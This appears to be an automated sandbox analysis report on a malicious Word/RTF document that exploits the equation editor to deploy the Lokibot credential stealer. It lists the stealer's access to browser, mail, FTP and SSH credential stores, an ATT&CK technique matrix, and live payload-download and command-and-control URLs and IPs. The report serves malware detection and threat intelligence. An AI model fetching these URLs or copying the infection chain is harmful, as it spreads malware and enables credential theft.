                Source: C:\Users\user\AppData\Roaming\wininit.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
                Source: C:\Users\user\AppData\Roaming\wininit.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Roaming\wininit.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\AppData\Roaming\wininit.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
                Source: C:\Users\user\AppData\Roaming\wininit.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
                Source: C:\Users\user\AppData\Roaming\wininit.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
                Source: C:\Users\user\AppData\Roaming\wininit.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
                Source: C:\Users\user\AppData\Roaming\wininit.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
                Source: C:\Users\user\AppData\Roaming\wininit.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
                Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: PopPassword15_2_0040D069
                Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: SmtpPassword15_2_0040D069
                Source: Yara matchFile source: 13.2.wininit.exe.3a0edc0.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.wininit.exe.3a28de0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.wininit.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.wininit.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000D.00000002.392918350.00000000028DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.393313668.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.393313668.0000000003881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting
                Valid Accounts32
                Exploitation for Client Execution
                1
                Scripting
                1
                DLL Side-Loading
                11
                Disable or Modify Tools
                2
                OS Credential Dumping
                1
                Account Discovery
                Remote Services1
                Archive Collected Data
                35
                Ingress Tool Transfer
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Command and Scripting Interpreter
                1
                DLL Side-Loading
                1
                Access Token Manipulation
                1
                Deobfuscate/Decode Files or Information
                2
                Credentials in Registry
                2
                File and Directory Discovery
                Remote Desktop Protocol1
                Browser Session Hijacking
                1
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts3
                PowerShell
                Logon Script (Windows)111
                Process Injection
                3
                Obfuscated Files or Information
                Security Account Manager14
                System Information Discovery
                SMB/Windows Admin Shares2
                Data from Local System
                3
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                Install Root Certificate
                NTDS1
                Security Software Discovery
                Distributed Component Object Model11
                Email Collection
                123
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing
                LSA Secrets1
                Process Discovery
                SSH1
                Clipboard Data
                Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain Credentials31
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                Masquerading
                DCSync1
                Application Window Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                Virtualization/Sandbox Evasion
                Proc Filesystem1
                System Owner/User Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Access Token Manipulation
                /etc/passwd and /etc/shadow1
                Remote System Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron111
                Process Injection
                Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 1559262 Sample: stthigns.doc Startdate: 20/11/2024 Architecture: WINDOWS Score: 100 62 Suricata IDS alerts for network traffic 2->62 64 Found malware configuration 2->64 66 Malicious sample detected (through community Yara rule) 2->66 68 23 other signatures 2->68 10 WINWORD.EXE 336 21 2->10         started        process3 file4 50 C:\Users\user\Desktop\stthigns.doc (copy), Rich 10->50 dropped 13 EQNEDT32.EXE 12 10->13         started        process5 dnsIp6 60 66.63.187.231, 49163, 49164, 80 ASN-QUADRANET-GLOBALUS United States 13->60 52 goodtoseeuthatgrea...irethingsgreatf.hta, HTML 13->52 dropped 54 goodtoseeuthatgrea...ingsgreatfor[1].hta, HTML 13->54 dropped 96 Office equation editor establishes network connection 13->96 98 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 13->98 18 mshta.exe 10 13->18         started        file7 signatures8 process9 signatures10 70 Suspicious powershell command line found 18->70 72 PowerShell case anomaly found 18->72 21 powershell.exe 23 18->21         started        process11 file12 44 C:\Users\user\AppData\Roaming\wininit.exe, PE32 21->44 dropped 46 C:\Users\user\AppData\Local\...\caspol[1].exe, PE32 21->46 dropped 48 C:\Users\user\AppData\...\4vzopkvk.cmdline, Unicode 21->48 dropped 82 Drops PE files with benign system names 21->82 84 Powershell drops PE file 21->84 25 wininit.exe 3 21->25         started        28 powershell.exe 4 21->28         started        30 csc.exe 2 21->30         started        signatures13 process14 file15 86 Antivirus detection for dropped file 25->86 88 Tries to steal Mail credentials (via file registry) 25->88 90 Machine Learning detection for dropped file 25->90 94 2 other signatures 25->94 33 wininit.exe 25->33         started        38 powershell.exe 4 25->38         started        92 Installs new ROOT certificates 28->92 56 C:\Users\user\AppData\Local\...\4vzopkvk.dll, PE32 30->56 dropped 40 cvtres.exe 30->40         started        signatures16 process17 dnsIp18 58 94.156.177.41, 49165, 49166, 49167 NET1-ASBG Bulgaria 33->58 42 C:\Users\user\AppData\...\5879F5.exe (copy), PE32 33->42 dropped 74 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 33->74 76 Tries to steal Mail credentials (via file / registry access) 33->76 78 Tries to harvest and steal ftp login credentials 33->78 80 Tries to harvest and steal browser information (history, passwords, etc) 33->80 file19 signatures20

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                stthigns.doc50%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882
                stthigns.doc100%AviraHEUR/Rtf.Malformed
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\caspol[1].exe100%AviraHEUR/AGEN.1306899
                C:\Users\user\AppData\Roaming\wininit.exe100%AviraHEUR/AGEN.1306899
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\caspol[1].exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\wininit.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://94.156.177.41/maxzi/five/fre.php100%Avira URL Cloudmalware
                http://66.63.187.231/xampp/wer/goodtoseeuthatgreatthingswithentirethingsgreatfor.hta100%Avira URL Cloudmalware
                http://66.63.187.231/xampp/wer/goodtoseeuthatgreatthingswithentirethingsgreatfor.htaV0%Avira URL Cloudsafe
                http://66.63.187.231/xampp/wer/goodtoseeuthatgreatthingswithentirethingsgreatfor.htaj0%Avira URL Cloudsafe
                http://66.63.187.231/33/caspol.exe(sU0%Avira URL Cloudsafe
                http://66.63.187.231/xampp/wer/goodtoseeuthatgreatthingswithentirethingsgreatfor.htaal0%Avira URL Cloudsafe
                http://66.63.187.231/33/caspol.eln0%Avira URL Cloudsafe
                http://66.63.187.231/33/caspol.exe100%Avira URL Cloudmalware
                94.156.177.41/maxzi/five/fre.php100%Avira URL Cloudmalware
                http://66.63.187.231/33/caspol.exeb0%Avira URL Cloudsafe
                No contacted domains info
                NameMaliciousAntivirus DetectionReputation
                http://66.63.187.231/xampp/wer/goodtoseeuthatgreatthingswithentirethingsgreatfor.htatrue
                • Avira URL Cloud: malware
                unknown
                http://66.63.187.231/33/caspol.exetrue
                • Avira URL Cloud: malware
                unknown
                http://kbfvzoboss.bid/alien/fre.phpfalse
                  high
                  http://94.156.177.41/maxzi/five/fre.phptrue
                  • Avira URL Cloud: malware
                  unknown
                  http://alphastand.top/alien/fre.phpfalse
                    high
                    http://alphastand.win/alien/fre.phpfalse
                      high
                      94.156.177.41/maxzi/five/fre.phptrue
                      • Avira URL Cloud: malware
                      unknown
                      http://alphastand.trade/alien/fre.phpfalse
                        high
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://66.63.187.231/xampp/wer/goodtoseeuthatgreatthingswithentirethingsgreatfor.htaalEQNEDT32.EXE, 00000002.00000002.359766415.000000000056F000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://nuget.org/NuGet.exepowershell.exe, 00000006.00000002.391849069.0000000003139000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://66.63.187.231/xampp/wer/goodtoseeuthatgreatthingswithentirethingsgreatfor.htaVEQNEDT32.EXE, 00000002.00000002.359766415.000000000056F000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://66.63.187.231/33/caspol.exe(sUpowershell.exe, 00000006.00000002.387368019.0000000002831000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://66.63.187.231/xampp/wer/goodtoseeuthatgreatthingswithentirethingsgreatfor.htajEQNEDT32.EXE, 00000002.00000002.360002424.0000000003540000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.ibsensoftware.com/wininit.exe, wininit.exe, 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                            high
                            https://contoso.com/powershell.exe, 00000006.00000002.391849069.0000000003139000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.391849069.0000000003139000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://contoso.com/Licensepowershell.exe, 00000006.00000002.391849069.0000000003139000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://contoso.com/Iconpowershell.exe, 00000006.00000002.391849069.0000000003139000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://66.63.187.231/33/caspol.elnpowershell.exe, 00000006.00000002.387368019.0000000002831000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://66.63.187.231/33/caspol.exebpowershell.exe, 00000006.00000002.387189760.00000000005D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.387368019.0000000002111000.00000004.00000800.00020000.00000000.sdmp, wininit.exe, 0000000D.00000002.392918350.00000000028DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://go.microspowershell.exe, 00000006.00000002.387368019.0000000002831000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
                                        IPDomainCountryFlagASNASN NameMalicious
                                        66.63.187.231
                                        unknownUnited States
                                        8100ASN-QUADRANET-GLOBALUStrue
                                        94.156.177.41
                                        unknownBulgaria
                                        43561NET1-ASBGtrue
                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1559262
                                        Start date and time:2024-11-20 11:07:05 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 6m 19s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                        Number of analysed new started processes analysed:19
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:stthigns.doc
                                        renamed because original name is a hash value
                                        Original Sample Name:seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seethebestthignsalwaysgivnebestthigns.doc
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.expl.evad.winDOC@18/31@0/2
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 87
                                        • Number of non-executed functions: 11
                                        Cookbook Comments:
                                        • Found application associated with file extension: .doc
                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                        • Attach to Office via COM
                                        • Scroll down
                                        • Close Viewer
                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                        • VT rate limit hit for: stthigns.doc
                                        TimeTypeDescription
                                        05:07:56API Interceptor67x Sleep call for process: EQNEDT32.EXE modified
                                        05:08:00API Interceptor18x Sleep call for process: mshta.exe modified
                                        05:08:02API Interceptor120x Sleep call for process: powershell.exe modified
                                        05:08:12API Interceptor1563x Sleep call for process: wininit.exe modified
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        66.63.187.231goodtoseeuthatgreatthingswithentirethingsgreatfor.htaGet hashmaliciousCobalt Strike, LokibotBrowse
                                        • 66.63.187.231/33/caspol.exe
                                        PO-000041492.docx.docGet hashmaliciousLokibotBrowse
                                        • 66.63.187.231/33/caspol.exe
                                        seemefasterthanbeforewithhisbestthingsinonlineforgetreadyfor.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                        • 66.63.187.231/657/caspol.exe
                                        PO-000041492.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                        • 66.63.187.231/xampp/noc/seemefasterthanbeforewithhisbestthingsinonlineforgetreadyfor.hta
                                        94.156.177.41goodtoseeuthatgreatthingswithentirethingsgreatfor.htaGet hashmaliciousCobalt Strike, LokibotBrowse
                                        • 94.156.177.41/maxzi/five/fre.php
                                        PO-000041492.docx.docGet hashmaliciousLokibotBrowse
                                        • 94.156.177.41/maxzi/five/fre.php
                                        ECxDwGGFH3.exeGet hashmaliciousLokibotBrowse
                                        • 94.156.177.41/simple/five/fre.php
                                        greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                        • 94.156.177.41/simple/five/fre.php
                                        Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                        • 94.156.177.41/simple/five/fre.php
                                        No context
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        ASN-QUADRANET-GLOBALUSgoodtoseeuthatgreatthingswithentirethingsgreatfor.htaGet hashmaliciousCobalt Strike, LokibotBrowse
                                        • 66.63.187.231
                                        ________.exeGet hashmaliciousQuasarBrowse
                                        • 155.94.209.8
                                        PO-000041492.docx.docGet hashmaliciousLokibotBrowse
                                        • 66.63.187.231
                                        ________.exeGet hashmaliciousQuasarBrowse
                                        • 69.174.98.113
                                        seemefasterthanbeforewithhisbestthingsinonlineforgetreadyfor.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                        • 66.63.187.231
                                        PO-000041492.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                        • 66.63.187.231
                                        RFQ541634_A_URGENT_QUOTATION_SHENLE.exeGet hashmaliciousGuLoaderBrowse
                                        • 64.188.27.210
                                        Order88983273293729387293828PDF.exeGet hashmaliciousQuasarBrowse
                                        • 72.11.156.80
                                        .main.elfGet hashmaliciousXmrigBrowse
                                        • 66.63.187.200
                                        mips.elfGet hashmaliciousMiraiBrowse
                                        • 104.223.82.201
                                        NET1-ASBGgoodtoseeuthatgreatthingswithentirethingsgreatfor.htaGet hashmaliciousCobalt Strike, LokibotBrowse
                                        • 94.156.177.41
                                        PO-000041492.docx.docGet hashmaliciousLokibotBrowse
                                        • 94.156.177.41
                                        ECxDwGGFH3.exeGet hashmaliciousLokibotBrowse
                                        • 94.156.177.41
                                        greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                        • 94.156.177.41
                                        Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                        • 94.156.177.41
                                        WjcXwIcclB.exeGet hashmaliciousLokibotBrowse
                                        • 94.156.177.41
                                        0aA7F59xDl.exeGet hashmaliciousLokibotBrowse
                                        • 94.156.177.95
                                        givemebestwithentiretimegivenmebestthingsalwaysforgetbacknew.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                        • 94.156.177.95
                                        seemybestbeautifulgirlwhowantbestthignsenitrelifetimethingstobe.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                        • 94.156.177.95
                                        seemefasterthanbeforewithhisbestthingsinonlineforgetreadyfor.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                        • 94.156.177.95
                                        No context
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        C:\Users\user\AppData\Roaming\CF97F5\5879F5.exe (copy)goodtoseeuthatgreatthingswithentirethingsgreatfor.htaGet hashmaliciousCobalt Strike, LokibotBrowse
                                          PO-000041492.docx.docGet hashmaliciousLokibotBrowse
                                            C:\Users\user\AppData\Roaming\wininit.exegoodtoseeuthatgreatthingswithentirethingsgreatfor.htaGet hashmaliciousCobalt Strike, LokibotBrowse
                                              PO-000041492.docx.docGet hashmaliciousLokibotBrowse
                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\caspol[1].exegoodtoseeuthatgreatthingswithentirethingsgreatfor.htaGet hashmaliciousCobalt Strike, LokibotBrowse
                                                  PO-000041492.docx.docGet hashmaliciousLokibotBrowse
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):4760
                                                    Entropy (8bit):4.834060479684549
                                                    Encrypted:false
                                                    SSDEEP:96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
                                                    MD5:838C1F472806CF4BA2A9EC49C27C2847
                                                    SHA1:D1C63579585C4740956B099697C74AD3E7C89751
